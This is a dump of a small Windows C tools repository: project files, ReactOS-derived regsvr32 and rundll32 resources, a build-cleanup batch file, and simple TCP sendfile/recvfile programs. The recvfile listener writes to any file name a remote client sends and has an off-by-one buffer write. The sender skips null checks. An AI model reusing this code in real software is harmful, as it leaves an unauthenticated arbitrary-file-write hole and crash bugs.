| true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | 88 | 89 | Level3 90 | Disabled 91 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | 93 | 94 | Console 95 | true 96 | 97 | 98 | 99 | 100 | 101 | 102 | Level3 103 | Disabled 104 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 105 | 106 | 107 | Console 108 | true 109 | 110 | 111 | 112 | 113 | Level3 114 | 115 | 116 | MaxSpeed 117 | true 118 | true 119 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 120 | 121 | 122 | Console 123 | true 124 | true 125 | true 126 | 127 | 128 | 129 | 130 | Level3 131 | 132 | 133 | MaxSpeed 134 | true 135 | true 136 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 137 | 138 | 139 | Console 140 | true 141 | true 142 | true 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | -------------------------------------------------------------------------------- /memoryload/memoryload.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /recvfile/recvfile.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #pragma comment(lib, "ws2_32.lib") 5 | 6 | 7 | void show_usage_and_exit(const char *prog) 8 | { 9 | fprintf(stderr, "Usage: %s \n", prog); 10 | exit(EXIT_FAILURE); 11 | } 12 | 13 | int recv_timeout(SOCKET s, char* buf, int len, int sec) 14 | { 15 | fd_set fdSet; 16 | struct timeval time; 17 | int iMode = 1; 18 | ioctlsocket(s, FIONBIO, (u_long FAR*)&iMode); 19 | time.tv_sec = sec; 20 | time.tv_usec = 0; 21 | FD_ZERO(&fdSet); 22 | FD_SET(s, &fdSet); 23 | if (select(s + 1, &fdSet, NULL, NULL, &time) <= 0) 24 | { 25 | printf("timeout\n"); 26 | closesocket(s); 27 | exit(EXIT_FAILURE); 28 | return 0; 29 | } 30 | return recv(s, buf, len, 0); 31 | } 32 | 33 | int main(int argc, char** argv) 34 | { 35 | char buf[8096]; 36 | int listenPort; 37 | SOCKET server; 38 | WSADATA wsa; 39 | 40 | if (argc != 2) 41 | show_usage_and_exit(argv[0]); 42 | 43 | WSAStartup(MAKEWORD(2, 2), &wsa); 44 | 45 | listenPort = atoi(argv[1]); 46 | 47 | server = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); 48 | if (server == INVALID_SOCKET) 49 | { 50 | printf("socket failed with error: %ld\n", WSAGetLastError()); 51 | return FALSE; 52 | } 53 | 54 | struct sockaddr_in sin; 55 | sin.sin_family = AF_INET; 56 | sin.sin_port = htons(listenPort); 57 | sin.sin_addr.S_un.S_addr = INADDR_ANY; 58 | 59 | if (bind(server, (LPSOCKADDR)&sin, sizeof(sin)) == SOCKET_ERROR) 60 | { 61 | printf("bind failed with error: %ld\n", WSAGetLastError()); 62 | closesocket(server); 63 | return FALSE; 64 | } 65 | 66 | if (listen(server, 5) == SOCKET_ERROR) 67 | { 68 | printf("listen failed with error: %ld\n", WSAGetLastError()); 69 | closesocket(server); 70 | return FALSE; 71 | } 72 | 73 | while (1) 74 | { 75 | SOCKET client = accept(server, NULL, NULL); 76 | if (client == INVALID_SOCKET) 77 | { 78 | printf("accept failed with error: %ld\n", WSAGetLastError()); 79 | continue; 80 | } 81 | 82 | char filename[1024] = { 0 }; 83 | int nRecv = recv_timeout(client, filename, sizeof(filename), 3); 84 | if (nRecv <= 0) 85 | { 86 | printf("recv failed with error: %ld\n", WSAGetLastError()); 87 | closesocket(client); 88 | continue; 89 | } 90 | 91 | filename[nRecv] = '\0'; 92 | 93 | printf("recv filename:%s\n", filename); 94 | 95 | char* ok = "OK"; 96 | int nSend = send(client, ok, strlen(ok), 0); 97 | if (nSend <= 0) 98 | { 99 | printf("send failed with error: %ld\n", WSAGetLastError()); 100 | closesocket(client); 101 | continue; 102 | } 103 | 104 | DWORD dwWritten = 0; 105 | HANDLE hFile = CreateFile(filename, GENERIC_WRITE, FILE_SHARE_WRITE, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); 106 | if (hFile == INVALID_HANDLE_VALUE) 107 | { 108 | printf("CreateFile failed with error: %ld\n", GetLastError()); 109 | closesocket(client); 110 | continue; 111 | } 112 | 113 | nRecv = recv_timeout(client, buf, sizeof(buf), 3); 114 | if (nRecv <= 0) 115 | { 116 | printf("recv failed with error: %ld\n", WSAGetLastError()); 117 | closesocket(client); 118 | CloseHandle(hFile); 119 | DeleteFile(filename); 120 | continue; 121 | } 122 | 123 | while (nRecv > 0) 124 | { 125 | WriteFile(hFile, buf, nRecv, &dwWritten, NULL); 126 | nRecv = recv_timeout(client, buf, sizeof(buf), 3); 127 | } 128 | 129 | printf("recv finished\n"); 130 | 131 | closesocket(client); 132 | CloseHandle(hFile); 133 | } 134 | 135 | closesocket(server); 136 | 137 | return 0; 138 | } 139 | 140 | -------------------------------------------------------------------------------- /recvfile/recvfile.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {0512D90E-7D7A-4FD6-B05A-3E172C2F24A9} 23 | Win32Proj 24 | recvfile 25 | 8.1 26 | 27 | 28 | 29 | Application 30 | true 31 | v140 32 | Unicode 33 | 34 | 35 | Application 36 | false 37 | v140 38 | true 39 | MultiByte 40 | 41 | 42 | Application 43 | true 44 | v140 45 | Unicode 46 | 47 | 48 | Application 49 | false 50 | v140 51 | true 52 | Unicode 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | true 74 | 75 | 76 | true 77 | 78 | 79 | false 80 | 81 | 82 | false 83 | 84 | 85 | 86 | 87 | 88 | Level3 89 | Disabled 90 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 91 | 92 | 93 | Console 94 | true 95 | 96 | 97 | 98 | 99 | 100 | 101 | Level3 102 | Disabled 103 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | 105 | 106 | Console 107 | true 108 | 109 | 110 | 111 | 112 | Level3 113 | 114 | 115 | MaxSpeed 116 | true 117 | true 118 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 119 | 120 | 121 | Console 122 | true 123 | true 124 | true 125 | 126 | 127 | 128 | 129 | Level3 130 | 131 | 132 | MaxSpeed 133 | true 134 | true 135 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 136 | 137 | 138 | Console 139 | true 140 | true 141 | true 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | -------------------------------------------------------------------------------- /recvfile/recvfile.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /regsvr32/en-US.rc: -------------------------------------------------------------------------------- 1 | #include "resource.h" 2 | /* 3 | * Moved all hardcoded strings to En.rc. 4 | * By Magnus Olsen 2005 magnus@itkonsult-olsen.com 5 | */ 6 | 7 | LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US 8 | STRINGTABLE DISCARDABLE 9 | BEGIN 10 | 11 | IDS_UsageMessage, "%s\n\nUsage: regsvr32 [/u] [/s] [/c] [/n] [/i[:cmdline]] dllname\n\ 12 | /u - Unregister server\n\ 13 | /s - Silent; display no message boxes\n\ 14 | /c - Console output\n\ 15 | /i - Call DllInstall passing it an optional [cmdline]; when used with /u calls dll uninstall\n\ 16 | /n - Do not call DllRegisterServer; this option must be used with /i" 17 | 18 | IDS_NoDllSpecified, "No DLL name specified." 19 | 20 | IDS_InvalidFlag, "Unrecognized flag: %s" 21 | 22 | IDS_SwitchN_NoI, "Unrecognized flag: /n must be used with the /i switch" 23 | 24 | IDS_DllNotLoaded, "LoadLibrary('%s') failed.\nGetLastError returns 0x%08x." 25 | 26 | IDS_MissingEntry, "%s was loaded, but the %s entry point was not found.\n\n\ 27 | %s may not be exported, or a corrupt version of %s may be in memory. Consider using PView to detect and remove it." 28 | 29 | IDS_FailureMessage, "%s in %s failed.\nReturn code was: 0x%08x" 30 | 31 | IDS_SuccessMessage "%s in %s succeeded." 32 | END 33 | -------------------------------------------------------------------------------- /regsvr32/regsvr32.rc: -------------------------------------------------------------------------------- 1 | /* $Id: regsvr32.rc 24947 2006-11-28 21:07:03Z janderwald $ */ 2 | 3 | #include 4 | #define REACTOS_STR_FILE_DESCRIPTION "Register a COM component in the registry\0" 5 | #define REACTOS_STR_INTERNAL_NAME "regsvr32\0" 6 | #define REACTOS_STR_ORIGINAL_FILENAME "regsvr32.exe\0" 7 | 8 | #include "en-US.rc" 9 | 10 | -------------------------------------------------------------------------------- /regsvr32/regsvr32.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {DEF8432B-7CB9-4973-9B7C-D3500F0735E6} 23 | Win32Proj 24 | regsvr32 25 | 8.1 26 | 27 | 28 | 29 | Application 30 | true 31 | v140 32 | Unicode 33 | 34 | 35 | Application 36 | false 37 | v140 38 | true 39 | Unicode 40 | 41 | 42 | Application 43 | true 44 | v140 45 | Unicode 46 | 47 | 48 | Application 49 | false 50 | v140 51 | true 52 | Unicode 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | true 74 | 75 | 76 | true 77 | 78 | 79 | false 80 | 81 | 82 | false 83 | 84 | 85 | 86 | 87 | 88 | Level3 89 | Disabled 90 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 91 | 92 | 93 | Console 94 | true 95 | 96 | 97 | 98 | 99 | 100 | 101 | Level3 102 | Disabled 103 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | 105 | 106 | Console 107 | true 108 | 109 | 110 | 111 | 112 | Level3 113 | 114 | 115 | MaxSpeed 116 | true 117 | true 118 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 119 | 120 | 121 | Windows 122 | true 123 | true 124 | true 125 | 126 | 127 | 128 | 129 | Level3 130 | 131 | 132 | MaxSpeed 133 | true 134 | true 135 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 136 | 137 | 138 | Windows 139 | true 140 | true 141 | true 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | -------------------------------------------------------------------------------- /regsvr32/regsvr32.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | 23 | 24 | Header Files 25 | 26 | 27 | 28 | 29 | Resource Files 30 | 31 | 32 | -------------------------------------------------------------------------------- /regsvr32/resource.h: -------------------------------------------------------------------------------- 1 | 2 | 3 | #define RC_STRING_MAX_SIZE 4096 4 | #define IDS_UsageMessage 100 5 | #define IDS_NoDllSpecified 101 6 | #define IDS_InvalidFlag 102 7 | #define IDS_SwitchN_NoI 103 8 | #define IDS_DllNotLoaded 104 9 | #define IDS_MissingEntry 105 10 | #define IDS_FailureMessage 106 11 | #define IDS_SuccessMessage 107 12 | 13 | /* EOF */ 14 | -------------------------------------------------------------------------------- /removejunk.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | echo ---------------------------------------------------- 3 | echo Press any key to delete all files with ending: 4 | echo *.aps *.idb *.ncp *.obj *.pch *.tmp *.sbr 5 | echo Visual c++/.Net junk 6 | echo ---------------------------------------------------- 7 | pause 8 | 9 | del /F /Q /S *.aps *.idb *.ncp *.obj *.pch *.sbr *.tmp *.pdb *.bsc *.ilk *.res *.ncb *.opt *.suo *.manifest *.dep *.tlog *.log *.lastbuildstate 10 | 11 | 12 | pause 13 | 14 | 15 | -------------------------------------------------------------------------------- /rundll32/lang/bg-BG.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smb01/CPPTools/9bb1f7e446da79795cf12669b9a2a23f6323aa61/rundll32/lang/bg-BG.rc -------------------------------------------------------------------------------- /rundll32/lang/cs-CZ.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smb01/CPPTools/9bb1f7e446da79795cf12669b9a2a23f6323aa61/rundll32/lang/cs-CZ.rc -------------------------------------------------------------------------------- /rundll32/lang/de-DE.rc: -------------------------------------------------------------------------------- 1 | #include "resource.h" 2 | /* 3 | * Translated into German. 4 | * By Rouven Wessling 2005 pentiumforever@gmail.com 5 | */ 6 | 7 | LANGUAGE LANG_GERMAN, SUBLANG_NEUTRAL 8 | STRINGTABLE DISCARDABLE 9 | BEGIN 10 | IDS_DllNotLoaded, "LoadLibrary laden von '%s' fehlgeschlagen" 11 | IDS_MissingEntry, "Fehlender Eintrag:%s\nIn %s" 12 | END 13 | -------------------------------------------------------------------------------- /rundll32/lang/el-GR.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smb01/CPPTools/9bb1f7e446da79795cf12669b9a2a23f6323aa61/rundll32/lang/el-GR.rc -------------------------------------------------------------------------------- /rundll32/lang/en-US.rc: -------------------------------------------------------------------------------- 1 | #include "resource.h" 2 | /* 3 | * Moved all hardcoded strings to En.rc. 4 | * By Magnus Olsen 2005 magnus@itkonsult-olsen.com 5 | */ 6 | 7 | LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US 8 | STRINGTABLE DISCARDABLE 9 | BEGIN 10 | IDS_DllNotLoaded, "LoadLibrary failed to load '%s'" 11 | IDS_MissingEntry, "Missing entry point:%s\nIn %s" 12 | END 13 | -------------------------------------------------------------------------------- /rundll32/lang/es-ES.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smb01/CPPTools/9bb1f7e446da79795cf12669b9a2a23f6323aa61/rundll32/lang/es-ES.rc -------------------------------------------------------------------------------- /rundll32/lang/fr-FR.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smb01/CPPTools/9bb1f7e446da79795cf12669b9a2a23f6323aa61/rundll32/lang/fr-FR.rc -------------------------------------------------------------------------------- /rundll32/lang/hu-HU.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smb01/CPPTools/9bb1f7e446da79795cf12669b9a2a23f6323aa61/rundll32/lang/hu-HU.rc -------------------------------------------------------------------------------- /rundll32/lang/id-ID.rc: -------------------------------------------------------------------------------- 1 | #include "resource.h" 2 | 3 | LANGUAGE LANG_INDONESIAN, SUBLANG_DEFAULT 4 | 5 | STRINGTABLE DISCARDABLE 6 | BEGIN 7 | IDS_DllNotLoaded, "LoadLibrary gagal untuk mengambil '%s'" 8 | IDS_MissingEntry, "entry point hilang:%s\nDalam %s" 9 | END 10 | -------------------------------------------------------------------------------- /rundll32/lang/it-IT.rc: -------------------------------------------------------------------------------- 1 | #include "resource.h" 2 | 3 | LANGUAGE LANG_ITALIAN, SUBLANG_NEUTRAL 4 | STRINGTABLE DISCARDABLE 5 | BEGIN 6 | IDS_DllNotLoaded, "LoadLibrary fallita '%s'" 7 | IDS_MissingEntry, "Manca:%s\nIn %s" 8 | END 9 | -------------------------------------------------------------------------------- /rundll32/lang/ja-JP.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smb01/CPPTools/9bb1f7e446da79795cf12669b9a2a23f6323aa61/rundll32/lang/ja-JP.rc -------------------------------------------------------------------------------- /rundll32/lang/lt-LT.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smb01/CPPTools/9bb1f7e446da79795cf12669b9a2a23f6323aa61/rundll32/lang/lt-LT.rc -------------------------------------------------------------------------------- /rundll32/lang/nl-NL.rc: -------------------------------------------------------------------------------- 1 | #include "resource.h" 2 | /* 3 | * Translation done by Vertaald door Eric Janssen 4 | */ 5 | 6 | LANGUAGE LANG_DUTCH, SUBLANG_NEUTRAL 7 | STRINGTABLE DISCARDABLE 8 | BEGIN 9 | IDS_DllNotLoaded, "LoadLibrary kon '%s' niet laden" 10 | IDS_MissingEntry, "Entry point:%s\n niet gevonden In %s" 11 | END 12 | -------------------------------------------------------------------------------- /rundll32/lang/no-NO.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smb01/CPPTools/9bb1f7e446da79795cf12669b9a2a23f6323aa61/rundll32/lang/no-NO.rc -------------------------------------------------------------------------------- /rundll32/lang/pl-PL.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smb01/CPPTools/9bb1f7e446da79795cf12669b9a2a23f6323aa61/rundll32/lang/pl-PL.rc -------------------------------------------------------------------------------- /rundll32/lang/pt-BR.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smb01/CPPTools/9bb1f7e446da79795cf12669b9a2a23f6323aa61/rundll32/lang/pt-BR.rc -------------------------------------------------------------------------------- /rundll32/lang/ro-RO.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smb01/CPPTools/9bb1f7e446da79795cf12669b9a2a23f6323aa61/rundll32/lang/ro-RO.rc -------------------------------------------------------------------------------- /rundll32/lang/ru-RU.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smb01/CPPTools/9bb1f7e446da79795cf12669b9a2a23f6323aa61/rundll32/lang/ru-RU.rc -------------------------------------------------------------------------------- /rundll32/lang/sk-SK.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smb01/CPPTools/9bb1f7e446da79795cf12669b9a2a23f6323aa61/rundll32/lang/sk-SK.rc -------------------------------------------------------------------------------- /rundll32/lang/th-TH.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smb01/CPPTools/9bb1f7e446da79795cf12669b9a2a23f6323aa61/rundll32/lang/th-TH.rc -------------------------------------------------------------------------------- /rundll32/lang/uk-UA.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smb01/CPPTools/9bb1f7e446da79795cf12669b9a2a23f6323aa61/rundll32/lang/uk-UA.rc -------------------------------------------------------------------------------- /rundll32/resource.h: -------------------------------------------------------------------------------- 1 | 2 | 3 | #define RC_STRING_MAX_SIZE 200 4 | #define IDS_DllNotLoaded 100 5 | #define IDS_MissingEntry 101 6 | 7 | /* EOF */ 8 | -------------------------------------------------------------------------------- /rundll32/rsrc.rc: -------------------------------------------------------------------------------- 1 | #include 2 | #include "resource.h" 3 | 4 | LANGUAGE LANG_NEUTRAL, SUBLANG_NEUTRAL 5 | 6 | #include "lang/bg-BG.rc" 7 | #include "lang/cs-CZ.rc" 8 | #include "lang/de-DE.rc" 9 | #include "lang/el-GR.rc" 10 | #include "lang/en-US.rc" 11 | #include "lang/es-ES.rc" 12 | #include "lang/fr-FR.rc" 13 | #include "lang/hu-HU.rc" 14 | #include "lang/id-ID.rc" 15 | #include "lang/it-IT.rc" 16 | #include "lang/lt-LT.rc" 17 | #include "lang/no-NO.rc" 18 | #include "lang/nl-NL.rc" 19 | #include "lang/pl-PL.rc" 20 | #include "lang/pt-BR.rc" 21 | #include "lang/ro-RO.rc" 22 | #include "lang/ru-RU.rc" 23 | #include "lang/sk-SK.rc" 24 | #include "lang/th-TH.rc" 25 | #include "lang/uk-UA.rc" 26 | -------------------------------------------------------------------------------- /rundll32/rundll32.rc: -------------------------------------------------------------------------------- 1 | /* $Id: rundll32.rc 24949 2006-11-28 21:20:25Z janderwald $ */ 2 | 3 | #include 4 | #define REACTOS_STR_FILE_DESCRIPTION "Run a DLL as an App\0" 5 | #define REACTOS_STR_INTERNAL_NAME "rundll32\0" 6 | #define REACTOS_STR_ORIGINAL_FILENAME "rundll32.exe\0" 7 | //#include 8 | 9 | #include "rsrc.rc" 10 | -------------------------------------------------------------------------------- /rundll32/rundll32.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {4005499D-84AD-4A74-9EF3-FB137EB54633} 23 | Win32Proj 24 | rundll32 25 | 8.1 26 | 27 | 28 | 29 | Application 30 | true 31 | v140 32 | Unicode 33 | 34 | 35 | Application 36 | false 37 | v140 38 | true 39 | Unicode 40 | 41 | 42 | Application 43 | true 44 | v140 45 | Unicode 46 | 47 | 48 | Application 49 | false 50 | v140 51 | true 52 | Unicode 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | true 74 | 75 | 76 | true 77 | 78 | 79 | false 80 | 81 | 82 | false 83 | 84 | 85 | 86 | 87 | 88 | Level3 89 | Disabled 90 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 91 | 92 | 93 | Console 94 | true 95 | 96 | 97 | 98 | 99 | 100 | 101 | Level3 102 | Disabled 103 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | 105 | 106 | Console 107 | true 108 | 109 | 110 | 111 | 112 | Level3 113 | 114 | 115 | MaxSpeed 116 | true 117 | true 118 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 119 | 120 | 121 | Windows 122 | true 123 | true 124 | true 125 | 126 | 127 | 128 | 129 | Level3 130 | 131 | 132 | MaxSpeed 133 | true 134 | true 135 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 136 | 137 | 138 | Windows 139 | true 140 | true 141 | true 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | -------------------------------------------------------------------------------- /rundll32/rundll32.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | 23 | 24 | Header Files 25 | 26 | 27 | 28 | 29 | Resource Files 30 | 31 | 32 | -------------------------------------------------------------------------------- /sendfile/sendfile.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #pragma comment(lib, "Shlwapi.lib") 6 | #pragma comment(lib, "ws2_32.lib") 7 | 8 | 9 | void show_usage_and_exit(const char *prog) 10 | { 11 | fprintf(stderr, "Usage: %s \n", prog); 12 | exit(EXIT_FAILURE); 13 | } 14 | 15 | int ns_parse_address(const char *str, char* host1, int* port1) 16 | { 17 | unsigned int a, b, c, d, port; 18 | int n = 0, len = 0; 19 | char host[200] = { 0 }; 20 | if (sscanf(str, "%199[^ :]:%u%n", host, &port, &len) == 2) { 21 | if (port1) 22 | *port1 = port; 23 | if (host1) 24 | strcpy(host1, host); 25 | } 26 | return port < 0xffff && str[len] == '\0' ? len : 0; 27 | } 28 | 29 | DWORD GetFileSize2(LPCTSTR pstrFile) 30 | { 31 | DWORD dwFileSize = 0; 32 | HANDLE hFile = NULL; 33 | hFile = CreateFile(pstrFile, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); 34 | if (hFile == INVALID_HANDLE_VALUE) 35 | return -1; 36 | dwFileSize = GetFileSize(hFile, NULL); 37 | CloseHandle(hFile); 38 | return dwFileSize; 39 | } 40 | 41 | BOOL ReadFile2(LPCTSTR lpstrFilePath, LPVOID lpBuffer, ULONG ulSize) 42 | { 43 | DWORD dwRead = 0; 44 | DWORD dwRet = 0; 45 | HANDLE hFile = NULL; 46 | hFile = CreateFile(lpstrFilePath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); 47 | if (hFile == INVALID_HANDLE_VALUE) 48 | return FALSE; 49 | if (!ReadFile(hFile, lpBuffer, ulSize, &dwRead, NULL)) 50 | { 51 | CloseHandle(hFile); 52 | return FALSE; 53 | } 54 | CloseHandle(hFile); 55 | return TRUE; 56 | } 57 | 58 | int recv_timeout(SOCKET s, char* buf, int len, int sec) 59 | { 60 | fd_set fdSet; 61 | struct timeval time; 62 | int iMode = 1; 63 | ioctlsocket(s, FIONBIO, (u_long FAR*)&iMode); 64 | time.tv_sec = sec; 65 | time.tv_usec = 0; 66 | FD_ZERO(&fdSet); 67 | FD_SET(s, &fdSet); 68 | if (select(s + 1, &fdSet, NULL, NULL, &time) <= 0) 69 | { 70 | printf("timeout\n"); 71 | closesocket(s); 72 | exit(EXIT_FAILURE); 73 | return 0; 74 | } 75 | return recv(s, buf, len, 0); 76 | } 77 | 78 | int main(int argc, char** argv) 79 | { 80 | struct sockaddr_in addr; 81 | struct hostent* hostent = NULL; 82 | SOCKET s = 0; 83 | WSADATA wsa; 84 | 85 | char host[200] = { 0 }; 86 | int port = 0; 87 | 88 | if (argc != 3) 89 | show_usage_and_exit(argv[0]); 90 | 91 | WSAStartup(MAKEWORD(1, 1), &wsa); 92 | 93 | ns_parse_address(argv[1], host, &port); 94 | 95 | s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); 96 | if (s == INVALID_SOCKET) 97 | { 98 | printf("socket failed with error: %ld\n", WSAGetLastError()); 99 | return 0; 100 | } 101 | 102 | addr.sin_family = AF_INET; 103 | addr.sin_port = htons(port); 104 | hostent = gethostbyname(host); 105 | addr.sin_addr = *((struct in_addr *)hostent->h_addr); 106 | 107 | if (connect(s, (SOCKADDR *)&addr, sizeof(addr)) == SOCKET_ERROR) 108 | { 109 | printf("connect failed with error: %ld\n", WSAGetLastError()); 110 | return 0; 111 | } 112 | 113 | char* filename = PathFindFileName(argv[2]); 114 | 115 | int nsend = send(s, filename, strlen(filename), 0); 116 | if (nsend == SOCKET_ERROR) 117 | { 118 | printf("send failed with error: %ld\n", WSAGetLastError()); 119 | closesocket(s); 120 | return 0; 121 | } 122 | 123 | char ok[3] = { 0 }; 124 | int nrecv = recv_timeout(s, ok, 2, 3); 125 | if (nrecv == SOCKET_ERROR) 126 | { 127 | printf("recv failed with error: %ld\n", WSAGetLastError()); 128 | closesocket(s); 129 | return 0; 130 | } 131 | 132 | if (ok[0] != 'O' || ok[1] != 'K') 133 | { 134 | printf("auth failed\n"); 135 | closesocket(s); 136 | return 0; 137 | } 138 | 139 | int bufLen = GetFileSize2(argv[2]); 140 | if (bufLen < 0) 141 | { 142 | printf("GetFileSize failed with error: %ld\n", GetLastError()); 143 | closesocket(s); 144 | return 0; 145 | } 146 | 147 | char* buf = malloc(bufLen); 148 | if (!ReadFile2(argv[2], buf, bufLen)) 149 | { 150 | printf("ReadFile failed with error: %ld\n", GetLastError()); 151 | closesocket(s); 152 | return 0; 153 | } 154 | 155 | nsend = send(s, buf, bufLen, 0); 156 | if (nsend == SOCKET_ERROR) 157 | { 158 | printf("send failed with error: %ld\n", WSAGetLastError()); 159 | closesocket(s); 160 | return 0; 161 | } 162 | 163 | printf("send ok\n"); 164 | 165 | free(buf); 166 | closesocket(s); 167 | return 0; 168 | } 169 | 170 | -------------------------------------------------------------------------------- /sendfile/sendfile.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {715D2472-A330-4821-BD4C-3A0844D3A547} 23 | Win32Proj 24 | sendfile 25 | 8.1 26 | 27 | 28 | 29 | Application 30 | true 31 | v140 32 | Unicode 33 | 34 | 35 | Application 36 | false 37 | v140 38 | true 39 | MultiByte 40 